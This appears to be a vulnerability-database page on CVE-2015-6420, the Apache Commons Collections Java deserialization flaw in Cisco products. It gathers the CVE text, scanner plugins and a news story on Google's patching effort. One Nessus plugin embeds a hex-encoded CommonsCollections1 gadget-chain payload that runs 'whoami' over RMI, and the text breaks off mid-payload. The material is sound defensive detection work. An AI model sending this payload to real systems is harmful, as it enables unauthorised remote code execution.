ID CVE-2015-6420 Type cve Reporter cve@mitre.org Modified 2018-10-01T21:29:00
Description
Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.
{"openvas": [{"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "scanner", "description": "This host is running Cisco\n WebEx Meetings Server and is prone to a java deserialization vulnerability.", "modified": "2019-03-14T00:00:00", "published": "2016-09-22T00:00:00", "id": "OPENVAS:1361412562310809053", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809053", "title": "Cisco WebEx Meetings Server Java Deserialization Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_webex_meetings_server_rce_vuln.nasl 14181 2019-03-14 12:59:41Z cfischer $\n#\n# Cisco WebEx Meetings Server Java Deserialization Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:webex_meetings_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809053\");\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_version(\"$Revision: 14181 $\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:59:41 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-22 13:01:32 +0530 (Thu, 22 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Cisco WebEx Meetings Server Java Deserialization Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Cisco\n WebEx Meetings Server and is prone to a java deserialization vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an insecure\n deserialization of user-supplied content by the affected software. An attacker\n could exploit this vulnerability by submitting crafted input to an application\n on a targeted system that uses the ACC library.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allow an\n unauthenticated, remote attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Cisco WebEx Meetings Server 2.5 before\n 2.5.1.6183, 2.6 before 2.6.1.45 and 2.0 versions.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Cisco WebEx Meetings Server\n version 2.5.1.6183 or 2.6.1.1099 or 2.6.1.45 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux17638\");\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CISCO\");\n script_dependencies(\"gb_cisco_webex_meetings_server_detect.nasl\");\n script_mandatory_keys(\"cisco/webex/detected\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!ciscoPort = get_app_port(cpe:CPE)){\n exit( 0 );\n}\n\nif(!vers = get_app_version(cpe:CPE, port:ciscoPort)){\n exit( 0 );\n}\n\nif(vers =~ \"^(2\\.6)\")\n{\n if(version_is_less(version:vers, test_version:\"2.6.1.45\"))\n {\n fix = \"2.6.1.1099 or 2.6.1.45\";\n VULN = TRUE;\n }\n}\nelse if(vers =~ \"^(2\\.5)\")\n{\n if(version_is_less(version:vers, test_version:\"2.5.1.6183\"))\n {\n fix = \"2.5.1.6183\";\n VULN = TRUE;\n }\n}\nelse if(vers =~ \"^(2\\.0)\")\n{\n if(version_is_less(version:vers, test_version:\"2.0.1.950\"))\n {\n fix = \"2.0.1.950 or 2.0.1.951 or 2.0.1.956\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:ciscoPort, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:22", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-kVjXR5o0M00/WLgFDaEd9MI/AAAAAAAArlA/fk3tKPAl2K4acq7akzIgq6ccXOr4RfTjgCLcB/s1600/google-mad-gadget-vulnerability-operation-rosehub-open-source-projects.png>)\n\nLast year Google employees took an initiative to help thousands of Open Source Projects patch a critical remote code execution vulnerability in a widely used Apache Commons Collections (ACC) library. \n \nDubbed** Operation Rosehub**, the initiative was volunteered by some 50 Google employees, who utilized 20 percent of their work time to patch over 2600 open source projects on Github, those were vulnerable to \"Mad Gadget vulnerability.\" \n \n**[Mad Gadget](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) vulnerability** ([CVE-2015-6420](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>)) is a remote code execution bug in the Java deserialization used by the Apache Commons Collections (ACC) library that could allow an unauthenticated, remote attacker to execute arbitrary code on a system. \n \nThe ACC Library is widely deployed by many Java applications to decode data passed between computers. To exploit this flaw, all an unauthorized attacker need to do is submit maliciously crafted input to an application on a targeted system that uses the ACC library. \n \nOnce the vulnerable ACC library on the affected system deserializes the content, the attacker could remotely execute arbitrary code on the compromised system, which could then be used to conduct further attacks. \n \n**Remember [ransomware attack on Muni Metro System](<https://thehackernews.com/2016/11/transit-system-hacked.html>)?** Late last year, an anonymous hacker managed to infect and take over more than 2,000 computers using this same Mad Gadget flaw in the software used to operate San Francisco's public transport system. \n \nFollowing the public disclosure of the Mad Gadget flaw, almost every commercial enterprise including Oracle, Cisco, Red Hat, VMWare, IBM, Intel, Adobe, HP, Jenkins, and SolarWinds formally disclosed that they had been impacted by this vulnerability and patched it in their software. \n \nHowever, few months after all big businesses patched the flaw, one of the Google employees noticed that several prominent open source libraries were still depending on the vulnerable versions of ACC library. \n\n\n> \"We recognized that the industry best practices had failed. An action was needed to keep the open source community safe. So rather than simply posting a security advisory asking everyone to address the vulnerability, we formed a task force to update their code for them. That initiative was called Operation Rosehub,\" Justine Tunney, Software Engineer on TensorFlow, wrote on Google [Open Source Blog](<https://opensource.googleblog.com/2017/03/operation-rosehub.html>).\n\nUnder Operation Rosehub, patches were sent to many open source projects, although the Google employees were only able to patch open source projects on GitHub that directly referenced vulnerable versions of ACC library. \n \nAccording to the Open Source Blog, if the San Francisco Municipal Transportation Agency's software systems had been open source, Google engineers would also have been able to deliver patches for Mad Gadget to them, and their systems would have never been compromised.\n", "modified": "2017-03-03T14:53:27", "published": "2017-03-02T00:48:00", "id": "THN:90DC43ADC5123FED500235ACDF6D6277", "href": "https://thehackernews.com/2017/03/google-mad-gadget-flaw.html", "type": "thn", "title": "Google Employees Help Thousands Of Open Source Projects Patch Critical \u2018Mad Gadget Bug\u2019", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-17T18:17:28", "bulletinFamily": "scanner", "description": "According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability due to unsafe deserialize\ncalls of unauthenticated Java objects to the Apache Commons\nCollections (ACC) library. An unauthenticated, remote attacker can\nexploit this, via crafted Java objects, to execute arbitrary code on\nthe target host.", "modified": "2019-11-02T00:00:00", "id": "CISCO_CUCM_CSCUX34835.NASL", "href": "https://www.tenable.com/plugins/nessus/93939", "published": "2016-10-10T00:00:00", "title": "Cisco Unified Communications Manager Java Object Deserialization RCE (CSCux34835)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93939);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCux34835\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20151209-java-deserialization\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Cisco Unified Communications Manager Java Object Deserialization RCE (CSCux34835)\");\n script_summary(english:\"Checks the version of Cisco Unified Communications Manager (CUCM).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability due to unsafe deserialize\ncalls of unauthenticated Java objects to the Apache Commons\nCollections (ACC) library. An unauthenticated, remote attacker can\nexploit this, via crafted Java objects, to execute arbitrary code on\nthe target host.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?94b4a89a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux34835/\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Unified Communications Manager version 9.1(2)SU5 /\n10.5(2)SU3a / 11.0(1a)SU2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version\");\nver_display = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version_Display\");\nfix_display = FALSE;\napp_name = \"Cisco Unified Communications Manager (CUCM)\";\n\n# No fix for 8\nif (ver =~ \"^[1-8]\\.\")\n fix_display = \"9.1(2)su5 / 9.1(2.15126.1)\";\nelse if (ver =~ \"^9\\.\" && ver_compare(ver:ver, fix:'9.1.2.15126.1', strict:FALSE) < 0)\n fix_display = \"9.1(2)su5 / 9.1(2.15126.1)\";\nelse if (ver =~ \"^10\\.\" && ver_compare(ver:ver, fix:'10.5.2.14065.1', strict:FALSE) < 0)\n fix_display = \"10.5(2)su3a / 10.5(2.14065.1)\";\nelse if (ver =~ \"^11\\.\" && ver_compare(ver:ver, fix:'11.0.1.22041.1', strict:FALSE) < 0)\n fix_display = \"11.0(1a)su2 / 11.0(1.22041.1)\";\n\nif (!fix_display)\n audit(AUDIT_INST_VER_NOT_VULN, app_name, ver_display);\n\norder = make_list('Cisco bug ID', 'Installed release', 'Fixed release');\nreport = make_array(\n order[0], \"CSCux34835\",\n order[1], ver_display,\n order[2], fix_display\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\nsecurity_report_v4(extra:report, port:0, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T18:17:29", "bulletinFamily": "scanner", "description": "The Cisco Prime Lan Management Solution (LMS) running on the remote\nweb server is affected by a remote code execution vulnerability due to\nunsafe deserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host.", "modified": "2019-11-02T00:00:00", "id": "CISCO_PRIME_LMS_JAVA_DESER.NASL", "href": "https://www.tenable.com/plugins/nessus/99934", "published": "2017-05-02T00:00:00", "title": "Cisco Prime LAN Management Solution Java Object Deserialization RCE (CSCux34647)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99934);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCux34647\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Cisco Prime LAN Management Solution Java Object Deserialization RCE (CSCux34647)\");\n script_summary(english:\"Sends an unexpected Java object to the RMI registry.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system running on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Cisco Prime Lan Management Solution (LMS) running on the remote\nweb server is affected by a remote code execution vulnerability due to\nunsafe deserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux34647\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"No release is planned by the vendor to fix this vulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_lan_management_solution\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_lms_web_detect.nasl\", \"rmiregistry_detect.nasl\");\n script_require_keys(\"installed_sw/cisco_lms\");\n script_require_ports(\"Services/rmi_registry\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"rmi.inc\");\n\nappname = 'cisco_lms';\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_service(svc:\"rmi_registry\", ipproto:\"tcp\", exit_on_fail:TRUE);\nsoc = rmi_connect(port:port);\n\n# Due to the nature of this exploit, we can't see the result of the\n# commands we execute. However, successful execution of our command\n# will always result in a specific exception being sent back to us.\n# This object (CommonCollections1) executes 'whoami' and we look\n# for the exception that indicates successful deserialization\nrequest = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x14\\x70\\x77\\x6e\\x65\\x64\\x32\\x39\\x33\\x38\\x34\\x38\\x31\\x36\\x30\\x37\\x31\\x38\\x39\\x38\\x32\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x06\\x77\\x68\\x6f\\x61\\x6d\\x69\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x1